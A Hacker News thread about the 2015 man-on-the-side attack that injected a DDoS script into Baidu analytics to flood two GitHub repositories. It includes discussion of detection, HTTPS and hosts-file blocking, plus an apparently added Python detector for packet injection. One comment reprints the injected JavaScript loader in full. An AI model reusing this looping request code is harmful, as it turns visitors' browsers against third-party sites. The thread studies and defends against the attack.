
China's Man-On-the-Side Attack on GitHub - netresec
http://www.netresec.com/?page=Blog&month=2015-03&post=China%27s-Man-on-the-Side-Attack-on-GitHub
======
JohnTHaller
Since the question of "why" and "how" is coming up again, here's a quick
summary I posted on reddit:

From a few different analyses on HN and elsewhere... Baidu has an analytics
product and an ads product, much like Google Analytics and Google AdSense,
which are used on all kinds of websites via Javascript. China has set the
Great Firewall of China to modify some of Baidu's assets so that any non-
Chinese IP gets a modified version of the Baidu analytics and ad code. The
modification causes every web browser visiting a Chinese site using a Baidu
analytics/ad product to load files from the greatfire and cn-nytimes projects
on github (both of which are designed to circumvent Chinese government
censorship) once every 2 seconds. The effect is that people all over the world
outside of China are unwilling participants in a DDoS against github.

github has responded by taking both projects offline and replacing their
content with a simple Javascript alert that shows a "WARNING: malicious
javascript detected on this domain" messagebox. This causes the folks visiting
baidu-infected sites to see the alert and know something is wrong with the
website (hopefully not visiting it again). It also prevents the malicious
Javascript from executing in a loop and reloading the site every 2 seconds.

One takeaway is that you should always have a backup of your code and
resources outside a single central site like github. Another is that you
should never ever have any webpage configured to load any resources from a
server hosted within China IP address space as it is vulnerable to this sort
of attack by the Chinese government.

~~~
ma2rten
actually both projects are still online on github.

[https://github.com/cn-nytimes](https://github.com/cn-nytimes)

[https://github.com/greatfire](https://github.com/greatfire)

~~~
rattray
They are _back_ on github now; they were indeed temporarily changed to return
only

    alert("WARNING: malicious javascript detected on this domain");

(or something similar). I saw this myself.

~~~
valgaze
From the Sony pictures incident to the attack on that satirical magazine in
Paris to this, it's getting pretty tiresome having to deal with authoritarian
types who believe they should dictate what other people can say or access.

For those curious, see below for a write up of the malicious javascript (uses
a simple ajax call & random number timer):
[http://insight-labs.org/?p=1682](http://insight-labs.org/?p=1682)

    // Load jQuery from Baidu's CDN, falling back to code.jquery.com if it failed to load.
    document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
    !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");

    startime = (new Date).getTime();

    var count = 0;

    // Seconds since the epoch; its parity picks which of the two targets to hit.
    function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 }

    url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];

    NUM = url_array.length;

    function r_send2() { var a = unixtime() % NUM; get(url_array[a]) }

    // Fetch the target as a <script> with cache-busting; when the request completes,
    // schedule the next one after a delay equal to the measured response time,
    // but only while less than 300 s (3E5 ms) have passed since the page loaded.
    function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } }) }

    function r_send(a) { setTimeout("r_send2()", a) }
    // First request fires 2 s after the page loads.
    setTimeout("r_send2()", 2E3);

~~~
rmchugh
Loading all of jQuery seems a little bit excessive when the only thing they're
using is the $.ajax function.
[http://youmightnotneedjquery.com/#request](http://youmightnotneedjquery.com/#request)

~~~
interdrift
On which side are you ._.

~~~
tomjen3
Engineers don't care what side anybody is on, as long as the tech works.

~~~
hobs
Really?

We knew the world would not be the same. A few people laughed, a few people
cried, most people were silent. I remembered the line from the Hindu
scripture, the Bhagavad-Gita... "Now, I am become Death, the destroyer of
worlds."

Any engineer worth his salt absolutely understands the consequences of their
actions on the world. Sometimes they understand a bit too late.

~~~
jc4p
hey buddy

~~~
hobs
What's up pvam

------
westiseast
For me the most interesting thing about this incident is how the GFW is being
used offensively. Most other governments so far have protested online
censorship from a kind of moral standpoint, but not from a security standpoint
per se. Now it's quite clear the GFW is being leveraged offensively - did
anyone spot this capability previously?

~~~
Laforet
It only really ramped up this year.

[http://furbo.org/2015/01/22/fear-china/](http://furbo.org/2015/01/22/fear-china/)

~~~
westiseast
Don't know why your comment has been voted down, that's an interesting link
and blog post and totally relevant to this thread :\

~~~
hkon
Don't underestimate the chinese capability to down vote

------
mraison
I still don't really get it. What's the actual goal behind the attack? When
the Chinese government decides to block a website, I can at least understand
their motivations, as bad as they may be. But DDOSing Github just seems to be
pissing the whole world off for a few hours without any actual long term
consequences.

~~~
j42
Actually, someone here (who I cannot remember) said quite eloquently yesterday
that our biggest export--and "influence" on the world--is culture.

For the first time I realized that pissing people off may, in fact, be the
objective, as the other reply stated.

China and Russia are both (quite unique) examples of countries with an
unfathomable degree of control over their citizens. It can be hard to grasp
occasionally, coming from a western mindset but for the vast majority within
said countries, the _entire_ reality they see and what they believe to be true
is heavily distorted--in that, it is defined by the vision of the oligarchy
and information is carefully controlled to produce a desired set of beliefs.
North Korea is an extreme caricature of this pattern.

Technology is naturally subversive to this as it lets people interact directly
with other cultures and ideologies which may provide contrasting philosophies
and--terrifyingly--the opportunity for free thought.

Restrict access to technology and you'll have a revolution. Instead, you
become the "troll," or the "problem," and quietly become isolated from large
areas of the network, all while reducing the amount of information you have to
sift through before passing it along to the populace, in the name of security.

And while the effect on actual traffic may be minimal, it does make for a very
cold perception which generally makes cross-cultural integration unlikely. How
many western consumer-technology companies do you see integrating with Asia-
based API's/demand, compared to other industry, let alone academics?

~~~
karcass
> the entire reality they see and what they believe to be true is heavily
> distorted--in that, it is defined by the vision of the oligarchy and
> information is carefully controlled to produce a desired set of beliefs.

That's pretty much how I feel about the Fox-watching population of the US.

~~~
carboncopy
> That's pretty much how I feel about the Fox-watching population of the US.

I used to think the same thing, and to some degree I think it holds truth. But
after spending lots of time with my right-wing family, I think it's a bit more
nuanced than that. Most avid Fox News watchers I've met fail to embrace the
entire world-view or vision promoted on the channel, and share maybe 60-70% of
the opinions elicited toward viewers. I know, it's just one data point, but I
don't have a study handy.

~~~
troels
I think it's generally safe to assume that a large chunk of people who happen
to hold opinions you disagree with don't hold them because they are retarded.
Even Fox News viewers.

------
cxseven
Netresec should be able to gradually increase the TTL of their packets going
to Baidu to see which hop or link is doing the hijack.

They mention someone did this earlier with the iCloud hijack by using mtr and
tcptraceroute, but it looks like these tools won't work as-is this time
because the Github man-on-the-side attack waits for the HTTP GET request. It's
probably stateless and if so could be triggered by a lone ACK with a proper
HTTP GET inside. As long as they're not behind a stateful firewall, replaying
their ACK at various TTLs to find the smallest TTL that triggers the hijack
would probably do the trick.

If the hijackers are clever they could make it look like the compromised hop
is further away than it actually is, but not closer. Even so, this could be
useful information and I'd love to see the result if anyone tries it.

Edit: changed trace method so that it'd actually work.

~~~
jackdawjack
I think this might be a daft question, but why can't they inject packets with
a (roughly) appropriate TTL for the current sequence that they're hijacking?
From the two examples shown one might think they're picking ttl's more
randomly

~~~
cxseven
They could make the packets stand out less, but there'd still be the
overlapping reply from the legitimate Baidu host, unless the attackers went
full MITM.

In case anyone is confused: we're now talking about the TTL of the packets
coming from hijackers, whereas I was originally talking about the TTL of the
packets going towards Baidu and the hijackers. The TTL the hijackers send
won't affect the tracing method I was suggesting.

------
riscy
"Our analysis shows that only about 1% of the requests for the Baidu Analytics
script are receiving the malicious javascript as response. So in 99% of the
cases everything behaves just like normal."

The way I see it, this has been a diagnostic test by the Chinese government,
ensuring they have the power to globally take down any website (or servers)
they please.

~~~
allochthon
Possibly. But whoever's behind it ends up looking kind of bad, since Github has
not capitulated.

~~~
coldcode
But if it were 100% would github be able to survive?

------
Rogerh91
Github should have a huge call-to-action banner for every China-based web
visitor that leads to this article translated into Mandarin.

Xi Jinping Millionaire Relations Reveal Fortunes of Elite

[http://www.bloomberg.com/news/articles/2012-06-29/xi-jinping...](http://www.bloomberg.com/news/articles/2012-06-29/xi-jinping-millionaire-relations-reveal-fortunes-of-elite)

Maybe add a Trollface gif while they're at it.

~~~
stingraycharles
... which is probably blocked for every China-based web visitor anyway.

~~~
Rogerh91
I should clarify: I don't think Github should link to the article directly
(which is banned since Bloomberg has been banned ever since they published
that article)

A plain-text mandarin version in a repo somewhere would suffice to challenge
the Chinese government's perception on what it really takes to censor the
Internet. I honestly think it would just highlight how much they're losing
against an organization of 300.

Failing that, I'm going to resort to my default plan of finding the best way
to donate money and time to help support Github, but I thought it was an idea
worth entertaining.

------
tn13
Our government is using our own money to spy and undermine our tech companies.
What exactly is it doing to ensure American companies are defended ?
Protecting us from international thugs like China's Communist Party is the
primary duty of our government.

~~~
themartorana
"... _should_ be the primary duty of our government."

Fixed it?

Although it's interesting to think about. Actual government retaliation
would/could be seen as war provocation, especially if China holds on to any
plausible deniability. Cyber warfare is currently very hard to prove, but even
harder to hold accountable for. Even with DPRK, and our little shut-down-
the-"internet" quiet retaliation thing that happened a few months back, North
Korea still disavows responsibility. I imagine holding China actually
responsible (in the way where it is recognized and acknowledged in the
international community) is almost impossible... And thus we would be seen as
the aggressors.

~~~
madez
A government doesn't have to react offensively against threats. It's also
possible to provide defensive measures. In this specific case it could provide
infrastructure, computing resources and personnel to fend off the attack.

~~~
Zancarius
Actually, that would be interesting...

Passing some sort of funding bill for the defense of US companies against DDoS
attacks might be the only immediate option that could be done on a short time
frame. Otherwise, it could (potentially) be something like the government
holding on to spare capacity in some way/shape/form that it leases to affected
companies for a very low rate.

As we move on further into the 21st century, I can't see this as something
that's going to go away. We definitely need to plan ahead.

------
rsuelzer
If anyone from GitHub is reading this, I know that many of us would like to
help. I imagine that the mitigation of this attack has been very costly. Is
there a place we can donate to help offset the cost of this attack? Maybe I
will purchase a subscription, but a one time payment would be preferable for
many of us.

~~~
toong
They've raised $100M from a16z about two years ago [1]? They should be fine
without your donation.

[1]
[https://news.ycombinator.com/item?id=4220353](https://news.ycombinator.com/item?id=4220353)

------
rufugee
If Baidu served everything over https, would that effectively make this attack
impossible unless the China GFW mitm'd the connections? I suppose that might
add a significant server load to Baidu, but I wonder if we should just start
accepting SSL as a cost of doing business on the internet.

Of course, that would require Baidu's cooperation, and I suppose they might
not want to raise the ire of the Chinese government. Also, I suppose the
government could just use their own heavily trafficked sites to do this, but
that should isolate it somewhat to Chinese IP ranges.

~~~
akfanta
> that would require Baidu's cooperation

Don't count on that. Baidu is part of the Chinese government gang. It is
notorious for censoring/altering search results both for political and
commercial reasons. I wouldn't be surprised if they were notified about this
beforehand.

------
rwhitman
So assuming that the Chinese government weaponized their firewall, the
question is why are they using it in such a transparent way?

Github is pretty firmly in the camp of open information, and used by nearly
every web software engineer in the world. Surely they're not going to succeed
at censoring these projects. As an attempt to project power and send some sort
of warning, something about it just seems like a pretty flawed strategy.

~~~
allochthon
> As an attempt to project power and send some sort of warning, something
> about it just seems like a pretty flawed strategy.

I've been wondering about that myself. Perhaps the lesson to be taken away by
most is that if you're not Github, you might not be able to effectively
counter such an attack. That could lead to self-censorship.

------
Aissen
One thing I don't understand: when you have the infrastructure to run the
Great Firewall, why not simply generate the traffic yourself ? At this point
you might just fake traffic from inside China with any kind of amplifiable no-
state protocol.

Sure, the TCP/HTTP attack might be a bit more resource intensive, but it
should be doable with the same capabilities provided by their DPI
infrastructure, no ?

 _Edit_ : Last but not least, if we are sure that this attack is indeed coming
from the GFW, then why isn't Obama calling Xi Jinping right now?

~~~
shawabawa3
> why not simply generate the traffic yourself ?

Couldn't github simply null-route all chinese-origin traffic in that case?

Currently the DDoS comes from everywhere _except_ china

~~~
adaml_623
The point of this DDoS attack is to prevent people in China from accessing
content on github. To null-route chinese-origin traffic would mean that the
attackers win.

(Obviously VPNs could be used to circumvent this null-route but they then
become vulnerable to the same attack)

~~~
shawabawa3
> The point of this DDoS attack is to prevent people in China from accessing
> content on github. To null-route chinese-origin traffic would mean that the
> attackers win.

China already has the capability to block people in china accessing github
(and I assume it does)

------
liugiul
So, fuck that. The Chinese gov are bullies, but now they're treading on my
lawn (or the lawn where I host my things, and all other things of
interest/importance).

What can I do? I already block ad tracking code in my browser with µblock. Can
I send an email to some English-speaking representative of the communist party
telling them to fuck off, and that I'll make sure to choose things not Made in
China from now on?

~~~
mariojv
Ghostery blocks most analytics trackers:
[https://www.ghostery.com/en/](https://www.ghostery.com/en/)

Google Analytics is blocked with that, I'd imagine Baidu Analytics would be
blocked too. You can configure it to block / not block individual pieces.

------
Hexcles
FYI, the referer (or referrer, whatever) method might not work well.

The hijacked code does reside on only a few Baidu domains, but it is used
(included by <script> tag) by TONS OF Chinese websites. The code is running in
these numerous pages which use Baidu products, not just in Baidu pages. Thus,
the referer actually varies a lot.

It is really a cleverer solution to notice the subtle difference of the
trailing slash.

------
djent
DDOS seems to be impacting me intermittently here in Rhode Island
[https://imgur.com/pW59MG3](https://imgur.com/pW59MG3)

~~~
samlambert
Hi Djent,

Would you mind sending an email to support@github.com with details on what you
were doing when that happened?

Thanks

~~~
dlgeek
It's happening for me constantly - just clicking the link from the discussion
- I get a (very) slow page load, then the unicorn page. I'm assuming it's a
timeout on the backend.

~~~
Rapzid
Last night same for me, browsing the Azure Kuda repo.

------
e79
I wonder how GitHub mitigated the attack so successfully. I can't find any
baidu scripts using the injected code anymore (in fact the original tracking
scripts on baidu's own domain return nothing), and GitHub is now serving the
two repos that were originally targeted.

What happened? Whatever it is, I'm glad they were able to mitigate the
attacks.

~~~
clippit
The injection has been stopped and Baidu's script checks if there exists a
referer.

~~~
zaroth
What do you mean "has been" stopped? There's no definitively stopping this
without HTTPS, which I'm pretty sure hasn't magically "happened" in China in
the last couple days.

The GFW may have ceased its attack, but there's no check you can possibly add
into an asset delivered over HTTP which can't be undone by the GFW.

As long as there's a script being delivered over HTTP, the GFW can intercept
that script request and replace with a script of its own.

~~~
clippit
I mean the Javascript hijacking has been stopped. This DDoS mixes several ways
and during the js hijacking period, GitHub returns `alert()` on specific url
for blocking browsers sending ajax requests. For now, the infected urls are
back to normal.

------
bentcorner
Can I black-hole all of China in my hosts file? Off the top of my head I'm not
going to miss anything, and I'd hate to be an unwitting participant in future
attacks.

~~~
jacquesm
[http://www.ipdeny.com/ipblocks/data/countries/cn.zone](http://www.ipdeny.com/ipblocks/data/countries/cn.zone)

------
mwsherman
Can browsers or OSs not treat the corrupted Baidu analytics as malware?

~~~
peteretep
You'd think, wouldn't you. Or instead simply blacklist Baidu's analytics code
completely. That will only hurt Chinese businesses using Baidu's product, and
no-one else.

~~~
TheDong
It would also hurt american, or european, or any nationality of business that
uses baidu to get more insight into chinese visitors.

Baidu is certainly most popular within china, but not exclusive to them.

~~~
teknologist
Google Analytics does all that, no worries

~~~
kuschku
Google Analytics is, sometimes, blocked by the GFW – so, if you already sell
out your users to Google, using Baidu wouldn’t be an unrealistic use case
anymore.

~~~
teknologist
Except when it decides to ddos github

------
dendory
If the attack happens as described, and those two repos are aimed at Chinese
people, why doesn't Github just block all requests to those pages that come
from outside China?

~~~
mkesper
That would be suicide for fear of death.

------
jjcc
Most people might not know what kind of organization GreatFire really is
because too much context is missing. I only discovered recently it's not so
simple. There have been a lot of talks about the behavior of GreatFire for
quite a while, but most of the talks are in Chinese. There are some in
English though; to give everybody a glimpse, here is an example:
[https://github.com/greatfire/wiki/issues/1](https://github.com/greatfire/wiki/issues/1)

My impression is that GreatFire tried to weaponize all the users of github.
They succeeded.

I don't like the GFW either. But I think I'm very likely to be downvoted
because the context of this incident is quite complicated. It's not easy to
tell the truth especially when it's against most people's belief.

~~~
carboncopy
Thanks for providing context. It might be unfair to thrust GitHub, and all
Chinese developers into this fight. The Chinese government— if the DDoS fails
— may very well just block access to Github, developer needs be damned.

Of course that would provide an opportunity for a Chinese counterpart of
Github to take market share, perhaps a favorable outcome?

~~~
ttflee
Many of us Chinese developers are already equipped with VPNs and tunnels as a
daily productivity tool. It seems that the purpose of the gov'nt is to block
access for less tech-savvy users, which greatfire and nytimes-cn provide.

------
songco
In China, there are lots of similar things, e.g. your Android phone downloads
an app from some site, and the ISP (or others in your network path) can detect
this (maybe by URL) and return a modified version (e.g. with its own ads added,
or maybe a complete competitor's product in place of the original app).

------
bsder
So, the real question is how should _we_ , the tech community, react?

~~~
mike_hearn
More SSL.

This attack works because the firewall is capable of reading plain HTTP
requests to spot the ones that are requesting the target javascripts, and then
statelessly injecting raced packets. Neither technique works when SSL is in
use. Even if China simply demanded the SSL keys from Baidu, they'd have to
decrypt every single connection on the fly and significantly upgrade their
infrastructure.

I think the only way to continue this technique in the presence of widespread
SSL use is to actually force Baidu to insert the malicious Javascript on their
own servers.

~~~
cbsmith
> Even if China simply demanded the SSL keys from Baidu, they'd have to
> decrypt every single connection on the fly and significantly upgrade their
> infrastructure.

Umm... not really. All you'd have to do is select whatever subset of
connections you want to inject code in to, and then terminate them with your
own web server that has Baidu's SSL keys, then let the rest of the connections
go through transparently to Baidu.

~~~
mike_hearn
You can't easily select that unless the stuff you want is on a dedicated
relatively low traffic hostname. If everything is served off e.g. ads.baidu.cn
then you have to decrypt _all_ ad traffic, which is a lot.

~~~
cbsmith
You can select a random subset very easily at the layer-3/4 level. It's really
not that different from just adding a host behind a layer-4 load balancer.

...and actually it doesn't have to be completely random. You could select
specific IP addresses to intercept.

------
pilgrim689
This is a really well-written article outlining how the man-on-the-side attack
on Baidu is carried out. The only flaw here is the logical leap that goes from
"Baidu is being hijacked" to "Baidu is being hijacked by the Chinese
government".

~~~
wnoise
The attack is not on Baidu, but via Baidu.

Whoever is the attacker appears to control the great firewall of China. Who
else would that be but the Chinese government?

~~~
imron
The Honker Union
[http://en.wikipedia.org/wiki/Honker_Union](http://en.wikipedia.org/wiki/Honker_Union)
and/or the Red Hacker Alliance
[http://en.wikipedia.org/wiki/Red_Hacker_Alliance](http://en.wikipedia.org/wiki/Red_Hacker_Alliance)

~~~
josefresco
The line seems to be blurry - as I'm sure it is around the world when it comes
to state level "hacking".

[http://en.wikipedia.org/wiki/Honker_Union#Relationship_with_...](http://en.wikipedia.org/wiki/Honker_Union#Relationship_with_Chinese_government)

~~~
imron
Sure, but the Chinese government has far more sophisticated ways of taking
down sites so their own citizens can't access them, and they're not afraid to
use them - even against big name sites. And in fact they often do, to help
local companies providing the same offerings to prosper.

The current DDoS attack just strikes me as too crude a method when they have
so many other options available.

If you were going to argue that it's just a retaliation towards GitHub for
hosting these projects, then once again there are others sites the government
is far more concerned about and they could use DDoS to bring them down with
far less publicity than what the GitHub DDoS is generating.

It just doesn't seem to make sense from either the method being used or the
motivation behind the attacks.

------
mingodad
Can the browser/os have an alert for such kind of behavior ? I mean if a
script/program is sending repeated/too many requests stop/slow/show users a
message ? Like when some javascript scripts is using too much cpu the browsers
actually inform the user if he/she wants to stop then ?

------
datashovel
This might not be a feasible reaction to the attacks, but in my mind the
people who are "unsuspecting attackers" aren't necessarily trying to access
GitHub in the first place.

So, what if they set up automated rule to block all IPs (for a period of time)
who show traffic patterns that indicate they are part of the attack, and then
for all those IPs who are trying to reach GitHub purposefully but are
currently blocked, give them explicit instructions on how to tunnel to regain
access to GitHub while the attack continues. This way only those who are (a)
part of the attack, and (b) want to access resources on GitHub need to do
anything special.

My guess is the number who would truly be affected by this are a tiny fraction
of the total number of people who are part of the attack.

------
misiti3780
i read that github contains content that the Chinese do not like and that is
why this is happening - what is the content they are so pissed about ?

~~~
jewbacca
[https://github.com/cn-nytimes/](https://github.com/cn-nytimes/) and
[https://github.com/greatfire/](https://github.com/greatfire/) host
information about and software for circumventing the Chinese government's
internet censorship systems -- which, among many other things, blocks access
to, eg, Google, and The New York Times.

Apparently they (the Chinese government) are not willing to entirely block
Github traffic in the same way (presumably as an important tool for their
software industry as well). This DDoS is an attempt to punish Github for not
removing this block-circumventing information, and force the inaccessibility
of those 2 repos specifically. It is being conducted in such a way that this
is readily obvious but plausibly deniable.

~~~
grandalf
> information about and software for circumventing the Chinese government's
> internet censorship systems -- which, among many other things, blocks access
> to, eg, Google, and The New York Times.

The actual impact of the attack was to have thousands of news outlets and
discussion forum sites mention and link to the github repos that offer
circumvention.

Further, by attacking Github, it's guaranteed that many of the most tech-savvy
Chinese internet users will have the existence of the forbidden repos launched
into their consciousness.

Of course the Chinese government knows this and was likely not responsible for
the attack.

The attack would not be possible to commit by the actual perpetrator if there
weren't such a knee-jerk bias against the Chinese government's internet
censorship.

Let it also be noted that the US Government censors lots of information too,
both through so-called "official secrets" requiring security clearance granted
by party members, and via laws that crack down on things deemed morally wrong,
as well as illicit drugs.

~~~
tjradcliffe
> Of course the Chinese government knows this and was likely not responsible
> for the attack.

This is an example of the logical fallacy of "argumentum ad stultum", or
"appeal to stupidity".

It goes like this:

- X would be stupid.
- No one would ever do anything stupid.
- Therefore no one would ever do X.

There are so many counter-examples to this argument that they hardly bear
mentioning. People do stupid things every day of the week and twice on
Sundays. Organizations multiply stupidity as often as they moderate it.

It may be that this wasn't the Chinese government, but pointing out that it
would be stupid for them to do so is not an argument against it at all.

~~~
grandalf
> People do stupid things every day of the week and twice on Sundays.

While you are correct in pointing out the logical fallacy, there have been
several examples of highly likely false-flag cyber attacks lately. The Sony
hack is another example, the result of which was the exact opposite of what
the state actor alleged to have done the attack wanted.

"Cyber attacks" are a great platform for false flag attacks because it's easy
to obtain servers or DDOS drones in any country.

I'd say a good indicator of strategy like this going on is when a defacing
attack is accompanied by targeted data breach. Chances are the data breach was
the goal, and the defacing the smoke screen.

Many HN readers could stage a cyber attack that would be initially linked to
North Korea or China with a few hours of reading/research.

------
dante9999
how is it possible that someone can carry this kind of attack without facing
any kind of legal consequences? I know they are china we're not going to start
a war with them but shit is there really no legal authority here?

------
geetee
This is some terrible JavaScript. And jQuery?

~~~
interdrift
It's obfuscated.

~~~
baudtack
Even un-obfuscated it's pretty gross.

------
taternuts
Does baidu have any say in this at all? Were they hacked to include this
script or they just passively allowed it?

~~~
corford
Baidu have not been hacked. Their servers reside inside the great firewall
meaning any request from outside China has to traverse the GFW before arriving
at Baidu's servers. During traversal of the GFW, the Chinese gov is modifying
the Baidu server response with malicious javascript.

Baidu has no say in the matter. They could try and help Github by swapping to
only serving their analytics scripts over HTTPS. Even then, this would only
help once a large majority of existing websites that use Baidu analytics have
updated their website code to point to the HTTPS URL. Until then the attack
would probably still continue to work.

~~~
johnbellone
It sounds like to me despite Baidu not being involved they are being used as a
vector of attack. It seems reasonable for anyone using Baidu to find an
alternative for all of their services. After seeing that China is modifying
responses how can we trust any request that goes past the GFW?

~~~
kbart
"It seems reasonable for anyone using Baidu to find an alternative for all of
their services."

As always, the majority of them simply don't care. Did many people stop using
Google after Snowden's leak on this side of the GFW?

------
jmngomes
"Based on reports we've received, we believe the intent of this attack is to
convince us to remove a specific class of content."

Does anyone know what that "specific class of content" is, or can shed some
light over the motivation of the attacks?

~~~
codesuela
> As can be seen in the code, the two targeted URLs are github.com/greatfire
> and github.com/cn-nytimes, which are mirror sites for GreatFire.org and the
> Chinese New York Times. GreatFire and NYT both use GitHub to circumvent the
> online censorship performed by the Great Firewall of China (GFW).

~~~
jmngomes
I read that. Can someone shed some light over the motivation of the attacks?

~~~
madez
Defending against a DoS attack costs money. People try to spend as little money
as possible.

So, the theory is that the attacker wants github to take the repos down by
making it costly to not do so.

------
xenophonf
I wonder why TCP implementations don't monitor mid-stream changes to things
like packet TTLs and optionally drop the connections as a result, or rather, I
wonder what would break if they did something like that.
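The two symptoms raised in this thread, cxseven's overlapping reply from the legitimate host and the mid-stream TTL change xenophonf proposes watching, turned into a passive detector. This is an added example, not code from the netresec write-up or from anyone in the thread; the addresses, TTLs and payloads are constructed sample data standing in for what a capture would yield.

```python
"""Detect man-on-the-side injection from per-segment metadata of a TCP flow.

Added example, not code from the netresec write-up or this thread. For each
server->client flow it checks two symptoms: the IP TTL of the server's
segments changing mid-stream, and two segments claiming the same TCP sequence
number with different payloads (the forged response racing the genuine one,
which the client then discards as a retransmission). All values are constructed.
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple


class Segment(NamedTuple):
    ts: float        # capture timestamp in seconds
    src: str         # server-side IP
    sport: int
    dst: str         # client-side IP
    dport: int
    ttl: int         # IP TTL observed at the capture point
    seq: int         # TCP sequence number of the first payload byte
    payload: bytes   # empty for SYN-ACK / pure ACK


FlowKey = Tuple[str, int, str, int]


def flow_key(s: Segment) -> FlowKey:
    return (s.src, s.sport, s.dst, s.dport)


def find_injection(segments: List[Segment]) -> List[dict]:
    """Return one finding per suspicious event, in capture order.

    The TTL baseline is the first segment of each flow (normally the SYN-ACK,
    which an injector racing a later GET never produces), so a forged data
    segment stands out even when it arrives before the genuine one. A lone
    'ttl_change' can also come from a legitimate route change, so treat
    'overlapping_payload' as the strong signal and the TTL as corroboration.
    """
    findings: List[dict] = []
    baseline_ttl: Dict[FlowKey, int] = {}
    # per flow: seq -> (ttl, payload) of the first data segment seen at that seq
    first_at_seq: Dict[FlowKey, Dict[int, Tuple[int, bytes]]] = defaultdict(dict)

    for s in sorted(segments, key=lambda x: x.ts):
        k = flow_key(s)
        base = baseline_ttl.setdefault(k, s.ttl)
        if not s.payload:
            continue                      # nothing to race in an empty segment
        if s.ttl != base:
            findings.append({"kind": "ttl_change", "flow": k, "seq": s.seq,
                             "baseline_ttl": base, "observed_ttl": s.ttl})
        prev = first_at_seq[k].get(s.seq)
        if prev is None:
            first_at_seq[k][s.seq] = (s.ttl, s.payload)
        elif prev[1] != s.payload:
            findings.append({"kind": "overlapping_payload", "flow": k,
                             "seq": s.seq, "first_ttl": prev[0], "second_ttl": s.ttl})
    return findings


def suspect_payloads(segments: List[Segment]) -> List[bytes]:
    """For each overlapping pair, return the copy whose TTL deviates from the
    flow baseline; if every copy matches the baseline, return all of them."""
    ordered = sorted(segments, key=lambda x: x.ts)
    baseline: Dict[FlowKey, int] = {}
    groups: Dict[Tuple[FlowKey, int], List[Segment]] = defaultdict(list)
    for s in ordered:
        baseline.setdefault(flow_key(s), s.ttl)
        if s.payload:
            groups[(flow_key(s), s.seq)].append(s)
    out: List[bytes] = []
    for (k, _seq), segs in groups.items():
        if len({s.payload for s in segs}) < 2:
            continue
        odd = [s.payload for s in segs if s.ttl != baseline[k]]
        out.extend(odd or sorted({s.payload for s in segs}))
    return out


# Constructed sample flow (TEST-NET addresses, made-up TTLs and payloads).
SERVER, CLIENT = "203.0.113.10", "198.51.100.7"
GENUINE = (b"HTTP/1.1 200 OK\r\nContent-Type: application/javascript\r\n\r\n"
           b"var _hmt=_hmt||[];")            # stands in for the real analytics script
INJECTED = (b"HTTP/1.1 200 OK\r\nContent-Type: application/javascript\r\n\r\n"
            b"setTimeout(\"r_send2()\",2E3);")  # stands in for the injected loader


def _seg(ts: float, ttl: int, seq: int, payload: bytes = b"") -> Segment:
    return Segment(ts, SERVER, 80, CLIENT, 51522, ttl, seq, payload)


CLEAN = [_seg(0.010, 42, 1000), _seg(0.180, 42, 1001, GENUINE)]
# The forged copy arrives 60 ms before the genuine one and carries a different TTL.
ATTACKED = [_seg(0.010, 42, 1000), _seg(0.120, 227, 1001, INJECTED),
            _seg(0.180, 42, 1001, GENUINE)]

if __name__ == "__main__":
    for finding in find_injection(ATTACKED):
        print(finding)
    print(suspect_payloads(ATTACKED))
```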

------
quarterto
I was under the impression that the attack had evolved since this tactic. Is
there any word on what the current attack looks like? Or is it still this?

------
simple123
Please modify your hosts file, so you will not be an unwilling participant in
the GFW of China in the future!

for example in Windows:

    127.0.0.1 libs.baidu.com
    127.0.0.1 hm.baidu.com

other Chinese GFW attack hosts

....

------
OneTwoFee
Are there any tools that would allow me to detect this kind of attack on my
computer? I'd prefer not to DoS github.

------
simple123
If Great Firewall of China could modify the javascript, is it possible for
U.S. to change it to a non-harmful script?

------
est
Well, that's a good analysis article and a good promotion for CapLoader.

Wireshark indeed can do better on Gantt charts and graphs

------
dav43
Could this be prevented by stricter CSP server-side?

------
arasmussen
> China's Man-on-the-Side Attack on GitHub

> and can conclude that China is using their active and passive network
> infrastructure

China is a country that has 1.35B people in it. I guarantee you that 99.9% of
those people had nothing to do with this attack. Can we stop using "China" and
be more specific? It feels like it's blaming innocent people and possibly an
entire innocent country.

Chinese attackers? The Chinese government? People outside China who hacked
Chinese internet infrastructure? At this point can we even be certain who
specifically is to blame?

~~~
EC1
Nobody is sitting here equating the word "China" with the entirety of the
Chinese people.

